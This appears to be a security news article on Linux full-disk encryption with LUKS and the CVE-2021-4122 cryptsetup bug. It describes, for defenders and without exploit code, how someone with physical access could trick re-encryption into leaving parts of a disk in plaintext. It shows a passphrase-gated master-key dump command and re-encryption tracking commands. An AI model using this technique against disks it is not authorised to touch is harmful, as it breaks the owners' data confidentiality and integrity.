But plenty of users and sysadmins don’t just “use Linux”, they’re responsible for hundreds, thousands, perhaps even millions of other people’s desktops, laptops and servers on which Linux is running.
Those sysadmins are usually responsible not merely for ensuring that the systems under their jurisdiction are running reliably, but also for keeping them as safe and secure as they can.
In today’s world, that almost certainly means knowing, understanding, deploying and managing some sort of full-disk encryption system, and on Linux, that probably means using a system called LUKS (Linux Unified Key Setup) and a program called cryptsetup to look after it.
FDE for the win
Full-disk encryption, usually referred to simply as FDE, is a simple but effective idea: encrypt every sector just before it’s written to the disk, regardless of the software, user, file or directory that it belongs to; decrypt every sector just after it’s read back in.
FDE is rarely enough on its own, because there’s basically one password for everything, so you usually end up by layering further levels of file-specific, app-sepcific or user-specific password protection on top of it.
But FDE can considered mandatory these days, notably for laptops, for exactly the same reason: there is AT LEAST one password for everthing, so there’s nothing left behind that isn’t encrypted at all.
With FDE, you don’t have to worry about files you might have forgotten to encrypt; or those temporary copies you made from an encrypted folder into an unencrytped one while preparing for a handover; or those annoyingly plentiful intermediate files that are unavoidably generated by your favourite apps when you use menu options such as Export, Compile or Print.
With FDE, everything gets encrypted, including unused parts of the disk, deleted sectors, filenames, swapfile data, the apps you’re using, the operating system files you’ve installed, and even the disk space you’ve deliberately zeroed out to forcibly overwrite what was there before.
After all, if you leave nothing unencrypted and your laptop gets stolen, the data on the disk isn’t much use to the thieves, or to the cybercrooks they sell it to.
If you can show that you did, indeed, install FDE on the now-missing laptops, then you can put your hand on your heart and swear to your auditors, to your regulators, to your customers – and even to inquisitive journalists! – that they have little or nothing to fear if that stolen laptop ever shows up on the dark web.
FDE considered green
Better yet, if you want to retire old equipment – especially if it’s not working reliably – then FDE generally makes it much less controversial to send the old gear for generic reuse or recycling.
FDE means that if someone with ulterior motives buys up superannuated kit from your recycling company, extracts the old disk drives and somehow coaxes ithem back to life, they won’t easily be able to dump your old data for fun and profit.
Without FDE, old storage devices become a bit like nuclear waste: there are very few people you dare trust them to for “repurposing”, so you typically ended up with old safes crammed with “we aren’t sure what to do with these yet” disk drives, or with a laborious device destruction protocol that is nowhere near as environmentally friendly as it ought to be.
(Dropping old materiel into a blast furnace is fast and effective – law enforcement teams have been known do this, live on TV, after weapons amnesties aimed at reducing endemic violence – but blindly vapourising computer kit and its many eosteric metals and polymers is no longer an acceptable face of “secure erasure”.)
But what if there’s a bug?
The problem with FDE – and, just as importantly, the software tools that help you manage it reliably – is that it’s easy to do badly.
Did you use the right cryptographic algorithm? Did you generate the encryption keys reliably? Did you handle the issue of data integrity properly? Can you change passwords safely and quickly? How easy is it to lock yourself out by mistake? What if you want to adjust the encryption parameters as your corporate policies evolve?
Unfortunately, the cryptsetup program, widely used to manage Linux FDE in a way that addresses the questions above, turns out to have had a nasty bug, dubbed CVE-2021-4122, in a useful feature it offers called re-encryption.
A well-designed FDE solution doesn’t use your password directly as a raw, low-level encryption key, for several good reasons:
Changing the low-level key means decrypting and re-encrypting the entire disk. This may take several hours.
Multiple users need to share a single key. So you can’t retire one user’s access without locking out everyone else at the same time.
Users often choose weak passwords, or suffer password breaches. If you realise this just happened, the faster you can change the password, the better.
So, most FDE systems choose a master passphrase for the device – for LUKS, it’s usually 512 bits long and comes from the kernel’s high-quality random generator.
Each password holder, up to 8 of them by default, chooses a personal password that’s used to create a personally-scrambled version of the master key stored in what LUKS calls a keyslot, so that the master key itself never actually needs to be stored anywhere except in memory while the device is in use.
Simply put: you can’t derive the master key for the device unless and until you provide a valid user key; none of the user keys are stored anywhere on the device; and neither the user keys nor the master key are ever revealed or stored in their plaintext forms by default.
You can dump the master key for a LUKS device, but it’s hard to do by mistake, and you need to put in a valid user key to generate the master key data:
# cryptsetup luksDump /dev/sdb --dump-master-key
WARNING!
========
The header dump with volume key is sensitive information
that allows access to encrypted partition without a passphrase.
This dump should be stored encrypted in a safe place.
Are you sure? (Type 'yes' in capital letters): YES
Enter passphrase for /dev/sdb: ****************
LUKS header information for /dev/sdb
Cipher name: aes
Cipher mode: xts-plain64
Payload offset: 32768
UUID: 72f6e201-cbdc-496b-98bd-707ece662c9a
MK bits: 512 <-- MK is short for "master key"
MK dump: 7a 31 05 ba f3 68 b6 be e5 6c 6f 16 92 44 ea 35
0b 66 fe ce ae ec a9 ec 22 db ea c9 9e 15 4d 60
f8 d0 b9 cb b5 1f ab f4 8f d3 e9 c1 1f 05 37 73
7d 64 df 8b be 38 e4 49 29 d1 5d 95 cd a4 9b 04
#
Reencryption options
As mentioned above, you sometimes need to change the master encryption settings on a device, especially if you need to adjust some of the parameters you used to keep up with changing encryption recommendations, such as switching to a larger key size.
For this purpose, cryptsetup provides a handy, but complex-to-implement, option called reencrypt, which actually takes care of three different processes: decrypting, encrypting, and re-encrypting your data, even while the device is in use.
Re-encrypting can, of course, be implemented with nothing more than options called --decrypt and --encrypt, but to re-encrypt a device while it is being used would then require you to decrypt the whole thing first, and then encrypt again from pure plaintext later on
That would leave you exposed to danger for much longer than is strictly necessary: if the device took 12 hours to decrypt and another 12 hours to encrypt again from scratch, at least some of the data on the disk would be in plaintext form for a full day, and more than 50% of the data would be in plaintext form for at least 12 hours.
Streamlining re-encryption
So, cryptsetup allows you to streamline the re-encryption process by keeping some of the disk encrypted with the old key, and the rest of it encrypted with the new key, while carefully keeping track of how far it’s got in case the process breaks half way through, or the computer needs to be shut down before the process has finished.
When you start up again, and a duly authorised user enters a password to mount the device (the user’s password temporarily decrypts both the old master key and the new one, so the double-barrelled decrypt-recrypt process can continue), the re-encryption process continues from where it left off…
…and at the end, the old master key is wiped out, and the new one committed as the sole encryption key for the underlying data.
Unfortunately, code that had been carefully designed to handle re-encryption was reused to implement the less useful but sometimes necessary options for “fully decrypt to plaintext” (equivalent to re-encrypting with a null cipher in the encryption stage), and “fully encrypt from plaintext” (essentially re-encryption with a null cipher in the decryption part).
And when repurposed in this way, the careful checks used in reencrypt mode to make sure that no-one had tampered with the temporary data used to track how far the process had got, and thus to prevent the abuse of the re-encrypt procedure by someone with root access to the disk but no knowledge of the password…
The problem was caused by reusing a mechanism designed for actual reencryption operation without reassessing the security impact for new encryption and decryption operations. While the reencryption requires calculating and verifying both key digests, no digest was needed to initiate decryption recovery if the destination is plaintext (no encryption key).
Simply put: someone with physical access to the disk, but who did not have the password to decrypt it themselves, could deceive the re-encryption tool into thinking that it was part-way through a decrypt-only procedure, and therefore trick the FDE software into decrypting part of the disk, and leaving it unencrypted.
As the bug-fix explains, the LUKS system itself cannot “protect against intentional modification [because someone with phsycal access to the disk could write to it without going through the LUKS code], but such modification must not cause a violation of data confidentiality.”
And that’s the risk here: that you could end up with a disk that seems to be encrypted; that still needs a valid password to mount; that behaves as if it’s encrypted; that might satisfy your auditors that it is encrypted…
…but that nevertheless contains (perhaps large and numerous) chunks that are not only stored in plaintext but also won’t get re-encrypted later on.
Even worse, perhaps, is the observation that:
The attack can also be reversed afterward (simulating crashed encryption from a plaintext) with possible modification of revealed plaintext.
What this means is that a malevolent user could silently decrypt parts of a disk, for example on a server, without the password, quietly modify the decrypted data while it was in plaintext form – thanks to the lack of integrity protection in plaintext mode – and then seamlessly and surreptitiously re-encrypt and “re-integrify” the data later on.
Loosely put, they could – in theory, at least – stitch you up for something quite naughty – fraudulent-looking entries in a spreadsheet, perhaps, or improper commands in your Bash history such as downloading a cryptominer – by inserting bogus “evidence” and then re-encrypting it under your password, even though they don’t actually know your password.
What to do?
Upgrade to cryptsetup 2.4.3 or later. If you run a Linux distro that provides regular updates, you may already have this version. (Use cryptsetup --version to find out.)
Learn how to detect when the reencrypt option is in use. You can use the luksDump function to see if partial decryption/enrcyption is in progress. (See below.)
Restrict physical access as carefully as you can. Sometimes, for example if you are using cloud services or co-located servers, you don’t have total control over who can get at what. But even in a world of trusted computing modules and tamper-proof cryptographic chips, there’s no need to give everyone access if you can avoid it.
CRYPTSETUP COMMANDS TO TRACK RE-ENCRYPTION
--> First command tells cryptsetup to boost the master key length to 512 bits
# cryptsetup reencrypt /dev/sdb --key-size 512
Enter passphrase for key slot 1:
[. . .]
--> While re-encrypting, you will see two extra keylots in use, one to access
--> the new master key (slot 0 here) and the other to keep track of how far
--> the decrypt-and-recrypt process has got (slot 2 here)
# cryptsetup luksDump /dev/sdb
[. . .]
Keyslots:
0: luks2 (unbound)
Key: 512 bits
[. . .]
Salt: f4 be b9 3f 15 bc 8f 97 43 2c f8 1f 31 e3 60 d1
[. . .]
1: luks2
Key: 256 bits
[. . .]
Salt: 75 33 81 96 ba f3 ec 8a dc ef 28 dc 68 a9 a7 44
[. . .]
2: reencrypt (unbound)
Key: 8 bits
Priority: ignored
Mode: reencrypt
Direction: forward
[. . .]
--> After the re-encryption is complete, keyslot 1 (for access to the
--> old master key) is removed, keyslot 2 (denoting the progress of the
--> procedure) is removed, and keyslot 0 takes over for access to the device
# cryptsetup luksDump /dev/sdb
[. . .]
Keyslots:
0: luks2
Key: 512 bits
[. . .]
Salt: f4 be b9 3f 15 bc 8f 97 43 2c f8 1f 31 e3 60 d1
[. . .]
We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept”, you consent to the use of the cookies. Cookie & Privacy Policy
This website uses cookies to improve your experience while you navigate through the website. Out of these, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may affect your browsing experience.
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.